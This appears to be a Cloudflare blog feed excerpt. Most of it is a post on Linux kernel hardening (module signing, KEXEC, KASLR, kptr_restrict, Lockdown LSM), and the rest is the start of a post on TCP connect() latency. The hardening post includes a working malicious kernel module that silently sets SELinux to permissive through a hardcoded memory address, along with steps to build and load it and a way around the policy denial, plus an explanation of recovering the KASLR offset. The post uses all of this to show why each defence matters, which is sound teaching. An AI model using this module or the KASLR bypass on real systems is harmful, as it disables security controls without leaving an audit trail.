            <pre><code>struct selinux_state {
#ifdef CONFIG_SECURITY_SELINUX_DISABLE
	bool disabled;
#endif
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
	bool enforcing;
#endif
	bool checkreqprot;
	bool initialized;
	bool policycap[__POLICYDB_CAP_MAX];

	struct page *status_page;
	struct mutex status_lock;

	struct selinux_avc *avc;
	struct selinux_policy __rcu *policy;
	struct mutex policy_mutex;
} __randomize_layout;</code></pre>
            <p>From the above, we can see that if the kernel configuration has <code>CONFIG_SECURITY_SELINUX_DEVELOP</code> enabled, the structure would have a boolean variable <code>enforcing</code>, which controls the enforcement status of SELinux at runtime. This is exactly what the above <code>$ sudo getenforce</code> command returns. We can double check that the Debian kernel indeed has the configuration option enabled:</p>
            <pre><code>ignat@dev:~$ grep CONFIG_SECURITY_SELINUX_DEVELOP /boot/config-`uname -r`
CONFIG_SECURITY_SELINUX_DEVELOP=y</code></pre>
            <p>Good! Now that we have a variable in the kernel, which is responsible for some security enforcement, we can try to attack it. One problem though is the <code>__randomize_layout</code> attribute: since <code>CONFIG_SECURITY_SELINUX_DISABLE</code> is actually not set for our Debian kernel, normally <code>enforcing</code> would be the first member of the struct. Thus if we know where the struct is, we immediately know the position of the <code>enforcing</code> flag. With <code>__randomize_layout</code>, during kernel compilation the compiler might place members at arbitrary positions within the struct, so it is harder to create generic exploits. But arbitrary struct randomization within the kernel <a href="https://elixir.bootlin.com/linux/v6.1.76/source/security/Kconfig.hardening#L301">may introduce a performance impact</a>, so it is often disabled, and it is disabled for the Debian kernel:</p>
            <pre><code>ignat@dev:~$ grep RANDSTRUCT /boot/config-`uname -r`
CONFIG_RANDSTRUCT_NONE=y</code></pre>
            <p>We can also confirm the compiled position of the <code>enforcing</code> flag using the <a href="https://git.kernel.org/pub/scm/devel/pahole/pahole.git/">pahole tool</a> and either kernel debug symbols, if available, or (on modern kernels, if enabled) in-kernel <a href="https://www.kernel.org/doc/html/next/bpf/btf.html">BTF</a> information. We will use the latter:</p>
            <pre><code>ignat@dev:~$ pahole -C selinux_state /sys/kernel/btf/vmlinux
struct selinux_state {
	bool                       enforcing;            /*     0     1 */
	bool                       checkreqprot;         /*     1     1 */
	bool                       initialized;          /*     2     1 */
	bool                       policycap[8];         /*     3     8 */

	/* XXX 5 bytes hole, try to pack */

	struct page *              status_page;          /*    16     8 */
	struct mutex               status_lock;          /*    24    32 */
	struct selinux_avc *       avc;                  /*    56     8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	struct selinux_policy *    policy;               /*    64     8 */
	struct mutex               policy_mutex;         /*    72    32 */

	/* size: 104, cachelines: 2, members: 9 */
	/* sum members: 99, holes: 1, sum holes: 5 */
	/* last cacheline: 40 bytes */
};</code></pre>
            <p>So <code>enforcing</code> is indeed located at the start of the structure and we don’t even have to be a privileged user to confirm this.</p><p>Great! All we need is the runtime address of the <code>selinux_state</code> variable inside the kernel:</p>
            <pre><code>ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffbc3bcae0 B selinux_state</code></pre>
            <p>With all the information, we can write an almost textbook simple kernel module to manipulate the SELinux state:</p><p>mymod.c:</p>
            <pre><code>#include &lt;linux/module.h&gt;

static int __init mod_init(void)
{
	bool *selinux_enforce = (bool *)0xffffffffbc3bcae0;
	*selinux_enforce = false;
	return 0;
}

static void mod_fini(void)
{
}

module_init(mod_init);
module_exit(mod_fini);

MODULE_DESCRIPTION("A somewhat malicious module");
MODULE_AUTHOR("Ignat Korchagin &lt;ignat@cloudflare.com&gt;");
MODULE_LICENSE("GPL");</code></pre>
            <p>And the respective <code>Kbuild</code> file:</p>
            <pre><code>obj-m := mymod.o</code></pre>
            <p>With these two files we can build a full fledged kernel module according to <a href="https://docs.kernel.org/kbuild/modules.html">the official kernel docs</a>:</p>
            <pre><code>ignat@dev:~$ cd mymod/
ignat@dev:~/mymod$ ls
Kbuild  mymod.c
ignat@dev:~/mymod$ make -C /lib/modules/`uname -r`/build M=$PWD
make: Entering directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'
  CC [M]  /home/ignat/mymod/mymod.o
  MODPOST /home/ignat/mymod/Module.symvers
  CC [M]  /home/ignat/mymod/mymod.mod.o
  LD [M]  /home/ignat/mymod/mymod.ko
  BTF [M] /home/ignat/mymod/mymod.ko
Skipping BTF generation for /home/ignat/mymod/mymod.ko due to unavailability of vmlinux
make: Leaving directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'</code></pre>
            <p>If we try to load this module now, the system may not allow it due to the SELinux policy:</p>
            <pre><code>ignat@dev:~/mymod$ sudo insmod mymod.ko
insmod: ERROR: could not load module mymod.ko: Permission denied</code></pre>
            <p>We can work around it by copying the module into the standard module path:</p>
            <pre><code>ignat@dev:~/mymod$ sudo cp mymod.ko /lib/modules/`uname -r`/kernel/crypto/</code></pre>
            <p>Now let’s try it out:</p>
            <pre><code>ignat@dev:~/mymod$ sudo getenforce
Enforcing
ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
ignat@dev:~/mymod$ sudo getenforce
Permissive</code></pre>
            <p>Not only did we disable the SELinux protection via a malicious kernel module, we did it quietly. Normal <code>sudo setenforce 0</code>, even if allowed, would go through the official <a href="https://elixir.bootlin.com/linux/v6.1.76/source/security/selinux/selinuxfs.c#L173">selinuxfs interface and would emit an audit message</a>. Our code manipulated the kernel memory directly, so no one was alerted. This illustrates why uncontrolled kernel module loading is very dangerous and that is why most security standards and commercial security monitoring products advocate for close monitoring of kernel module loading.</p><p>But we don’t need to monitor kernel modules at Cloudflare. Let’s repeat the exercise on a Cloudflare production kernel (module recompilation skipped for brevity):</p>
            <pre><code>ignat@dev:~/mymod$ uname -a
Linux dev 6.6.17-cloudflare-2024.2.9 #1 SMP PREEMPT_DYNAMIC Mon Sep 27 00:00:00 UTC 2010 x86_64 GNU/Linux
ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
insmod: ERROR: could not insert module /lib/modules/6.6.17-cloudflare-2024.2.9/kernel/crypto/mymod.ko: Key was rejected by service</code></pre>
            <p>We get a <code>Key was rejected by service</code> error when trying to load a module, and the kernel log will have the following message:</p>
            <pre><code>ignat@dev:~/mymod$ sudo dmesg | tail -n 1
[41515.037031] Loading of unsigned module is rejected</code></pre>
            <p>This is because the Cloudflare kernel <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/module/Kconfig#L211">requires all the kernel modules to have a valid signature</a>, so we don’t even have to worry about a malicious module being loaded at some point:</p>
            <pre><code>ignat@dev:~$ grep MODULE_SIG_FORCE /boot/config-`uname -r`
CONFIG_MODULE_SIG_FORCE=y</code></pre>
            <p>For completeness it is worth noting that the Debian stock kernel also supports module signatures, but does not enforce it:</p>
            <pre><code>ignat@dev:~$ grep MODULE_SIG /boot/config-6.1.0-18-cloud-amd64
CONFIG_MODULE_SIG_FORMAT=y
CONFIG_MODULE_SIG=y
# CONFIG_MODULE_SIG_FORCE is not set
…</code></pre>
            <p>The above configuration means that the kernel will validate a module signature, if one is available. If not, the module will be loaded anyway: a warning message is emitted and the <a href="https://docs.kernel.org/admin-guide/tainted-kernels.html">kernel is tainted</a>.</p>
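    <p>Whether an unsigned module has ever been loaded on a running system can be checked via the kernel’s taint mask (a small sketch based on the taint flags documented in the kernel admin guide; bit 13, value 8192, flag <code>E</code>, means an unsigned module was loaded):</p>
            <pre><code># Read the current taint mask
tainted=$(cat /proc/sys/kernel/tainted)
echo "taint mask: $tainted"

# Extract the "unsigned module loaded" bit (value 8192)
if [ $(( (tainted / 8192) % 2 )) -ne 0 ]; then
    echo "an unsigned module has been loaded"
fi</code></pre>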
    <div>
      <h3>Key management for kernel module signing</h3>
      <a href="#key-management-for-kernel-module-signing">
        
      </a>
    </div>
    <p>Signed kernel modules are great, but they create a key management problem: to sign a module we need a signing keypair that is trusted by the kernel. The public key of the keypair is usually directly embedded into the kernel binary, so the kernel can easily use it to verify module signatures. The private key of the pair needs to be protected and kept secret, because if it is leaked, anyone could compile and sign a potentially malicious kernel module which would be accepted by our kernel.</p><p>But what is the best way to eliminate the risk of losing something? Not to have it in the first place! Luckily, the kernel build system <a href="https://elixir.bootlin.com/linux/v6.6.17/source/certs/Makefile#L36">will generate a random keypair</a> for module signing, if none is provided. At Cloudflare, we use that feature to sign all the kernel modules during the kernel compilation stage. When the compilation and signing are done, instead of storing the key in a secure place, we just destroy the private key:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1EWN5Kh5NebZTW3kAzK9uM/0dfb98bc095710e5b317a128d3efb1c0/image1-19.png" />
            
            </figure><p>So with the above process:</p><ol><li><p>The kernel build system generates a random keypair and compiles the kernel and modules</p></li><li><p>The public key is embedded into the kernel image, the private key is used to sign all the modules</p></li><li><p>The private key is destroyed</p></li></ol><p>With this scheme not only do we not have to worry about module signing key management, we also use a different key for each kernel we release to production. So even if a particular build process is hijacked and the signing key is leaked instead of destroyed, the key will no longer be valid when a kernel update is released.</p><p>There are some flexibility downsides though, as we can’t “retrofit” a new kernel module for an already released kernel (for example, for <a href="https://www.cloudflare.com/en-gb/press-releases/2023/cloudflare-powers-hyper-local-ai-inference-with-nvidia/">a new piece of hardware we are adopting</a>). However, it is not a practical limitation for us as we release kernels often (roughly every week) to keep up with a steady stream of bug fixes and vulnerability patches in the Linux Kernel.</p>
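    <p>The flow can be sketched with stock tools (a simplified illustration; a real kernel build generates the key via <code>certs/Makefile</code> and signs modules with <code>scripts/sign-file</code>):</p>
            <pre><code># 1. Generate a throwaway signing keypair for this build only
openssl req -x509 -new -nodes -newkey rsa:4096 -days 1 \
    -subj "/CN=Ephemeral module signing key/" \
    -keyout signing_key.pem -out signing_cert.pem

# 2. The build embeds signing_cert.pem into the kernel image and uses
#    signing_key.pem to sign every module

# 3. Destroy the private key once all modules are signed
shred -u signing_key.pem</code></pre>
    <p>Because every release gets a fresh key, a leaked key is only ever valid for a single kernel build.</p>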
    <div>
      <h2>KEXEC</h2>
      <a href="#kexec">
        
      </a>
    </div>
    <p><a href="https://en.wikipedia.org/wiki/Kexec">KEXEC</a> (or <code>kexec_load()</code>) is an interesting system call in Linux, which allows one kernel to directly execute (or jump to) another kernel. The idea behind this is to switch/update/downgrade kernels faster without going through a full reboot cycle to minimize the potential system downtime. However, it was developed quite a while ago, when secure boot and system integrity were not yet major concerns. Therefore its original design has security flaws and is known to be able to <a href="https://mjg59.dreamwidth.org/28746.html">bypass secure boot and potentially compromise system integrity</a>.</p><p>We can see the problems just based on the <a href="https://man7.org/linux/man-pages/man2/kexec_load.2.html">definition of the system call itself</a>:</p>
            <pre><code>struct kexec_segment {
	const void *buf;
	size_t bufsz;
	const void *mem;
	size_t memsz;
};
...
long kexec_load(unsigned long entry, unsigned long nr_segments, struct kexec_segment *segments, unsigned long flags);</code></pre>
            <p>So the kernel expects just a collection of buffers with code to execute. Back in those days there was not much desire to do a lot of data parsing inside the kernel, so the idea was to parse the to-be-executed kernel image in user space and provide the kernel with only the data it needs. Also, to switch kernels live, we need an intermediate program which would take over while the old kernel is shutting down and the new kernel has not yet been executed. In the kexec world this program is called <a href="https://git.kernel.org/pub/scm/utils/kernel/kexec/kexec-tools.git/tree/purgatory">purgatory</a>. Thus the problem is evident: we give the kernel a bunch of code and it will happily execute it at the highest privilege level. But instead of the original kernel or purgatory code, we can easily provide code similar to the one demonstrated earlier in this post, which disables SELinux (or does something else to the kernel).</p><p>At Cloudflare we have had <code>kexec_load()</code> disabled for some time now just because of this. The advantage of faster reboots with kexec comes with <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/Kconfig.kexec#L30">a (small) risk of improperly initialized hardware</a>, so it was not worth using it even without the security concerns. However, kexec does provide one useful feature — it is the foundation of the Linux kernel <a href="https://docs.kernel.org/admin-guide/kdump/kdump.html">crashdumping solution</a>. In a nutshell, if a kernel crashes in production (due to a bug or some other error), a backup kernel (previously loaded with kexec) can take over, collect and save the memory dump for further investigation. 
This allows us to investigate kernel and other issues in production more effectively, so it is a powerful tool to have.</p><p>Luckily, since the <a href="https://mjg59.dreamwidth.org/28746.html">original problems with kexec were outlined</a>, Linux developed an alternative <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/Kconfig.kexec#L36">secure interface for kexec</a>: instead of buffers with code, it expects file descriptors with the to-be-executed kernel image and initrd and does parsing inside the kernel. Thus, only a valid kernel image can be supplied. On top of this, we can <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/Kconfig.kexec#L48">configure</a> and <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/Kconfig.kexec#L62">require</a> kexec to ensure the provided images are properly signed, so only authorized code can be executed in the kexec scenario. A secure configuration for kexec looks something like this:</p>
            <pre><code>ignat@dev:~$ grep KEXEC /boot/config-`uname -r`
CONFIG_KEXEC_CORE=y
CONFIG_HAVE_IMA_KEXEC=y
# CONFIG_KEXEC is not set
CONFIG_KEXEC_FILE=y
CONFIG_KEXEC_SIG=y
CONFIG_KEXEC_SIG_FORCE=y
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…</code></pre>
            <p>Above we ensure that the legacy <code>kexec_load()</code> system call is disabled by disabling <code>CONFIG_KEXEC</code>, but can still configure Linux kernel crashdumping via the new <code>kexec_file_load()</code> system call (<code>CONFIG_KEXEC_FILE=y</code>) with enforced signature checks (<code>CONFIG_KEXEC_SIG=y</code> and <code>CONFIG_KEXEC_SIG_FORCE=y</code>).</p><p>Note that the stock Debian kernel has the legacy <code>kexec_load()</code> system call enabled and does not enforce signature checks for <code>kexec_file_load()</code> (similar to module signature checks):</p>
            <pre><code>ignat@dev:~$ grep KEXEC /boot/config-6.1.0-18-cloud-amd64
CONFIG_KEXEC=y
CONFIG_KEXEC_FILE=y
CONFIG_ARCH_HAS_KEXEC_PURGATORY=y
CONFIG_KEXEC_SIG=y
# CONFIG_KEXEC_SIG_FORCE is not set
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…</code></pre>
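<p>Comparing such configs by hand is error-prone. As a quick illustration, here is a small Python sketch (the <code>parse_kconfig</code> and <code>kexec_findings</code> helpers are our own, not a standard tool) that parses kernel config text and flags the kexec weaknesses discussed above:</p>

```python
# Sketch: audit kexec-related options in a kernel config.
# A line "# CONFIG_FOO is not set" means the option is disabled.

def parse_kconfig(text):
    """Parse kernel .config text into {option: value}; unset options map to None."""
    opts = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#") and line.endswith("is not set"):
            opts[line.split()[1]] = None
        elif line.startswith("CONFIG_") and "=" in line:
            key, _, value = line.partition("=")
            opts[key] = value
    return opts

def kexec_findings(opts):
    """Return a list of warnings for the kexec hardening discussed above."""
    findings = []
    if opts.get("CONFIG_KEXEC") == "y":
        findings.append("legacy kexec_load() is enabled")
    if opts.get("CONFIG_KEXEC_FILE") == "y" and opts.get("CONFIG_KEXEC_SIG_FORCE") != "y":
        findings.append("kexec_file_load() does not enforce signatures")
    return findings

# The Debian config fragment shown above:
debian = """\
CONFIG_KEXEC=y
CONFIG_KEXEC_FILE=y
CONFIG_KEXEC_SIG=y
# CONFIG_KEXEC_SIG_FORCE is not set
"""
print(kexec_findings(parse_kconfig(debian)))
```

Running it against the Debian snippet reports both the enabled legacy syscall and the missing signature enforcement, while a config matching the Cloudflare settings produces no findings.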
            
    <div>
      <h2>Kernel Address Space Layout Randomization (KASLR)</h2>
      <a href="#kernel-address-space-layout-randomization-kaslr">
        
      </a>
    </div>
    <p>Even on the stock Debian kernel, if you try to repeat the exercise we described in the “Secure boot” section of this post after a system reboot, you will likely find that it now fails to disable SELinux. This is because we hardcoded the kernel address of the <code>selinux_state</code> structure in our malicious kernel module, but the address has since changed:</p>
            <pre><code>ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state</code></pre>
            <p><a href="https://docs.kernel.org/security/self-protection.html#kernel-address-space-layout-randomization-kaslr">Kernel Address Space Layout Randomization (or KASLR)</a> is a simple concept: it slightly and randomly shifts the kernel code and data on each boot:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6e7sTU0q25lHmBG5b4Q8if/d19a762047547d6f14dff4f9ab8f2d81/Screenshot-2024-03-06-at-13.53.23-2.png" />
            
            </figure><p>This is to combat targeted exploitation (like the malicious module in this post) based on the knowledge of the location of internal kernel structures and code. It is especially useful for popular Linux distribution kernels, like the Debian one, because most users use the same binary and anyone can download the debug symbols and the System.map file with all the addresses of the kernel internals. Just to note: it will not prevent the module from loading and doing harm, but the module will likely not achieve the targeted effect of disabling SELinux. Instead, it will modify a random piece of kernel memory, potentially causing the kernel to crash.</p><p>Both the Cloudflare kernel and the Debian one have this feature enabled:</p>
            <pre><code>ignat@dev:~$ grep RANDOMIZE_BASE /boot/config-`uname -r`
CONFIG_RANDOMIZE_BASE=y</code></pre>
            
    <div>
      <h3>Restricted kernel pointers</h3>
      <a href="#restricted-kernel-pointers">
        
      </a>
    </div>
    <p>While KASLR helps with targeted exploits, it is quite easy to bypass since everything is shifted by a single random offset, as shown in the diagram above. Thus, if the attacker knows at least one runtime kernel address, they can recover this offset by subtracting the compile-time address of the same symbol (function or data structure), taken from the kernel’s System.map file, from the runtime address. Once they know the offset, they can recover the addresses of all other symbols by adjusting them by this offset.</p><p>Therefore, modern kernels take precautions not to leak kernel addresses, at least to unprivileged users. One of the main tunables for this is the <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#kptr-restrict">kptr_restrict sysctl</a>. It is a good idea to set it at least to <code>1</code> so that regular users cannot see kernel pointers:</p>
            <pre><code>ignat@dev:~$ sudo sysctl -w kernel.kptr_restrict=1
kernel.kptr_restrict = 1
ignat@dev:~$ grep selinux_state /proc/kallsyms
0000000000000000 B selinux_state</code></pre>
            <p>Privileged users can still see the pointers:</p>
            <pre><code>ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state</code></pre>
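<p>To make the offset arithmetic from the previous section concrete, here is a toy Python sketch. The runtime address is the one shown above; the compile-time addresses are made-up stand-ins for System.map entries:</p>

```python
# Toy illustration of recovering the KASLR offset (slide) from one leaked
# symbol address. The compile-time addresses below are hypothetical.
static_addr = 0xFFFFFFFF826BCAE0   # selinux_state in System.map (made up)
runtime_addr = 0xFFFFFFFFB41BCAE0  # selinux_state from /proc/kallsyms

# The slide is the difference between the runtime and compile-time addresses.
kaslr_offset = runtime_addr - static_addr

# Any other symbol can now be relocated with the same offset.
static_text = 0xFFFFFFFF81000000   # e.g. _text in System.map (made up)
runtime_text = static_text + kaslr_offset

print(hex(kaslr_offset), hex(runtime_text))
```

A single leaked runtime address is enough to defeat the randomization, which is why restricting kernel pointer leaks matters so much.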
            <p>Similar to the <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#kptr-restrict">kptr_restrict sysctl</a>, there is also <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#dmesg-restrict">dmesg_restrict</a>, which, if set, prevents regular users from reading the kernel log (which may also leak kernel pointers via its messages). While you need to explicitly set the <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#kptr-restrict">kptr_restrict sysctl</a> to a non-zero value on each boot (or use a system sysctl configuration utility, like <a href="https://www.freedesktop.org/software/systemd/man/latest/systemd-sysctl.service.html">this one</a>), you can configure the initial value of <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#dmesg-restrict">dmesg_restrict</a> via the <code>CONFIG_SECURITY_DMESG_RESTRICT</code> kernel configuration option. Both the Cloudflare kernel and the Debian one enforce <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#dmesg-restrict">dmesg_restrict</a> this way:</p>
            <pre><code>ignat@dev:~$ grep CONFIG_SECURITY_DMESG_RESTRICT /boot/config-`uname -r`
CONFIG_SECURITY_DMESG_RESTRICT=y</code></pre>
            <p>It is worth noting that <code>/proc/kallsyms</code> and the kernel log are not the only sources of potential kernel pointer leaks. There is a lot of legacy in the Linux kernel, and new sources are continuously being found and patched. That’s why it is very important to stay up to date with the latest kernel bugfix releases.</p>
    <div>
      <h2>Lockdown LSM</h2>
      <a href="#lockdown-lsm">
        
      </a>
    </div>
    <p><a href="https://www.kernel.org/doc/html/latest/admin-guide/LSM/index.html">Linux Security Modules (LSM)</a> is a hook-based framework for implementing security policies and Mandatory Access Control in the Linux Kernel. We have covered our usage of another LSM module, BPF-LSM, previously.</p><p>BPF-LSM is a useful foundational piece for our kernel security, but in this post we want to mention another useful LSM module we use — <a href="https://man7.org/linux/man-pages/man7/kernel_lockdown.7.html">the Lockdown LSM</a>. Lockdown can be in three states (controlled by the <code>/sys/kernel/security/lockdown</code> special file):</p>
            <pre><code>ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality</code></pre>
            <p><code>none</code> is the state where nothing is enforced and the module is effectively disabled. When Lockdown is in the <code>integrity</code> state, the kernel tries to prevent any operation that may compromise its integrity. We already covered some examples of these in this post: loading unsigned modules and executing unsigned code via KEXEC. But there are other potential ways (which are mentioned in <a href="https://man7.org/linux/man-pages/man7/kernel_lockdown.7.html">the LSM’s man page</a>), all of which this LSM tries to block. <code>confidentiality</code> is the most restrictive mode, where Lockdown will also try to prevent any information leakage from the kernel. In practice this may be too restrictive for server workloads, as it blocks all runtime debugging capabilities, like <code>perf</code> or eBPF.</p><p>Let’s see the Lockdown LSM in action. On a barebones Debian system the initial state is <code>none</code>, meaning nothing is locked down:</p>
            <pre><code>ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality</code></pre>
            <p>We can switch the system into the <code>integrity</code> mode:</p>
            <pre><code>ignat@dev:~$ echo integrity | sudo tee /sys/kernel/security/lockdown
integrity
ignat@dev:~$ cat /sys/kernel/security/lockdown
none [integrity] confidentiality</code></pre>
            <p>It is worth noting that we can only put the system into a more restrictive state, but not back. That is, once in <code>integrity</code> mode we can only switch to <code>confidentiality</code> mode, but not back to <code>none</code>:</p>
            <pre><code>ignat@dev:~$ echo none | sudo tee /sys/kernel/security/lockdown
none
tee: /sys/kernel/security/lockdown: Operation not permitted</code></pre>
            <p>Now we can see that even on a stock Debian kernel, which, as we discovered above, does not enforce module signatures by default, we cannot load a potentially malicious unsigned kernel module anymore:</p>
            <pre><code>ignat@dev:~$ sudo insmod mymod/mymod.ko
insmod: ERROR: could not insert module mymod/mymod.ko: Operation not permitted</code></pre>
            <p>And the kernel log will helpfully point out that this is due to Lockdown LSM:</p>
            <pre><code>ignat@dev:~$ sudo dmesg | tail -n 1
[21728.820129] Lockdown: insmod: unsigned module loading is restricted; see man kernel_lockdown.7</code></pre>
            <p>As we can see, Lockdown LSM helps to tighten the security of a kernel, which otherwise may not have other enforcing bits enabled, like the stock Debian one.</p><p>If you compile your own kernel, you can go one step further and set <a href="https://elixir.bootlin.com/linux/v6.6.17/source/security/lockdown/Kconfig#L33">the initial state of the Lockdown LSM to be more restrictive than none from the start</a>. This is exactly what we did for the Cloudflare production kernel:</p>
            <pre><code>ignat@dev:~$ grep LOCK_DOWN /boot/config-6.6.17-cloudflare-2024.2.9
# CONFIG_LOCK_DOWN_KERNEL_FORCE_NONE is not set
CONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y
# CONFIG_LOCK_DOWN_KERNEL_FORCE_CONFIDENTIALITY is not set</code></pre>
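<p>As a small aside, the active Lockdown state is simply the bracketed entry in the <code>/sys/kernel/security/lockdown</code> file shown earlier. A minimal parsing sketch (our own helper, not a kernel API):</p>

```python
def active_lockdown_state(contents):
    """Return the active (bracketed) state from the contents of
    /sys/kernel/security/lockdown, e.g. "none [integrity] confidentiality"."""
    for token in contents.split():
        if token.startswith("[") and token.endswith("]"):
            return token[1:-1]
    return None  # unexpected format

print(active_lockdown_state("none [integrity] confidentiality"))  # integrity
```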
            
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>In this post we reviewed some useful Linux kernel security configuration options we use at Cloudflare. This is only a small subset, and there are many more available and even more are being constantly developed, reviewed, and improved by the Linux kernel community. We hope that this post will shed some light on these security features and that, if you haven’t already, you may consider enabling them in your Linux systems.</p>
    <div>
      <h2>Watch on Cloudflare TV</h2>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p>Tune in for more news, announcements and thought-provoking discussions! Don't miss the full <a href="https://cloudflare.tv/shows/security-week">Security Week hub page</a>.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Kernel]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">3ySkqS53T1nhzX61XzJFEG</guid>
            <dc:creator>Ignat Korchagin</dc:creator>
        </item>
        <item>
            <title><![CDATA[connect() - why are you so slow?]]></title>
            <link>https://blog.cloudflare.com/linux-transport-protocol-port-selection-performance/</link>
            <pubDate>Thu, 08 Feb 2024 14:00:27 GMT</pubDate>
            <description><![CDATA[ This is our story of what we learned about the connect() implementation for TCP in Linux. Both its strong and weak points. How connect() latency changes under pressure, and how to open connection so that the syscall latency is deterministic and time-bound ]]></description>
            <content:encoded><![CDATA[ <p>It is no secret that Cloudflare is encouraging companies to deprecate their use of IPv4 addresses and move to IPv6 addresses. We have a couple of articles on the subject from this year:</p><ul><li><p><a href="/amazon-2bn-ipv4-tax-how-avoid-paying/">Amazon’s $2bn IPv4 tax – and how you can avoid paying it</a></p></li><li><p><a href="/ipv6-from-dns-pov/">Using DNS to estimate worldwide state of IPv6 adoption</a></p></li></ul><p>And many more in our <a href="/searchresults#q=IPv6&amp;sort=date%20descending&amp;f:@customer_facing_source=[Blog]&amp;f:@language=[English]">catalog</a>. To help with this, we spent time this last year investigating and implementing infrastructure to reduce our internal and egress use of IPv4 addresses. We prefer to re-allocate our addresses rather than purchase more, due to increasing costs. And in this effort we discovered that our cache service is one of our bigger consumers of IPv4 addresses. Before we remove IPv4 addresses from our cache services, we first need to understand how cache works at Cloudflare.</p>
    <div>
      <h2>How does cache work at Cloudflare?</h2>
      <a href="#how-does-cache-work-at-cloudflare">
        
      </a>
    </div>
    <p>Describing the full <a href="https://developers.cloudflare.com/reference-architecture/cdn-reference-architecture/#cloudflare-cdn-architecture-and-design">architecture</a> is out of scope for this article; however, we can provide a basic outline:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/70ULgxsqU4zuyWYVrNn6et/8c80079d6dd93083059a875bbf48059d/image1-2.png" />
            
            </figure><ol><li><p>Internet user makes a request to pull an asset</p></li><li><p>Cloudflare infrastructure routes that request to a handler</p></li><li><p>Handler machine returns the cached asset, or on a miss</p></li><li><p>Handler machine reaches out to the origin server (owned by a customer) to pull the requested asset</p></li></ol><p>The particularly interesting part is the cache miss case. When a website suddenly becomes very popular, many uncached assets may need to be fetched all at once. Hence we may make upwards of 50k TCP unicast connections to a single destination.</p><p>That is a lot of connections! We have strategies in place to limit the impact of this or avoid this problem altogether. But in the rare cases when it occurs, we balance these connections over two source IPv4 addresses.</p><p>Our goal is to remove the load balancing and prefer one IPv4 address. To do that, we need to understand the performance impact of two IPv4 addresses vs one.</p>
    <div>
      <h2>TCP connect() performance of two source IPv4 addresses vs one IPv4 address</h2>
      <a href="#tcp-connect-performance-of-two-source-ipv4-addresses-vs-one-ipv4-address">
        
      </a>
    </div>
    <p>We leveraged a tool called <a href="https://github.com/wg/wrk">wrk</a>, and modified it to distribute connections over multiple source IP addresses. Then we ran a workload of 70k connections over 48 threads for a period of time.</p><p>During the test we measured the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/tcp_ipv4.c#L201">tcp_v4_connect()</a> with the BPF BCC libbpf-tools <a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c">funclatency</a> tool to gather latency metrics as time progresses.</p><p>Note that throughout the rest of this article, all the numbers are specific to a single machine with no production traffic. We assume that if we can improve a worst-case scenario of the algorithm on a best-case machine, the results can be extrapolated to production. Lock contention was specifically taken out of the equation, but will have production implications.</p>
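<p>For readers unfamiliar with funclatency-style output: it groups latency samples into power-of-ten buckets. A rough Python model of that bucketing (our own sketch, not the tool’s code) looks like this:</p>

```python
import math
from collections import Counter

def log10_bucket(latency_ns):
    """Return the power-of-ten bucket a latency sample falls into."""
    return 10 ** int(math.log10(latency_ns))

def histogram(samples_ns):
    """Count samples per power-of-ten nanosecond bucket, the way a
    funclatency-style histogram groups them."""
    return Counter(log10_bucket(ns) for ns in samples_ns)

# A synthetic bimodal workload: some fast connects, some slow ones.
samples = [900, 1_200, 3_500, 45_000, 60_000, 1_100_000, 2_400_000]
print(sorted(histogram(samples).items()))
```

A bimodal workload like the ones charted below shows up as two distinct clusters of populated buckets.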
    <div>
      <h3>Two IPv4 addresses</h3>
      <a href="#two-ipv4-addresses">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1q7v3WNgI5X3JQg5ua0B8g/5b557ca762a08422badae379233dee76/image6.png" />
            
            </figure><p>The y-axis shows buckets of nanoseconds in powers of ten. The x-axis represents the number of connections made per bucket. Therefore, more connections in the lower powers-of-ten buckets is better.</p><p>We can see that the majority of the connections occur in the fast case, with roughly ~20k in the slow case. We should expect this bimodal distribution to become more pronounced over time due to wrk continuously closing and establishing connections.</p><p>Now let us look at the performance of one IPv4 address under the same conditions.</p>
    <div>
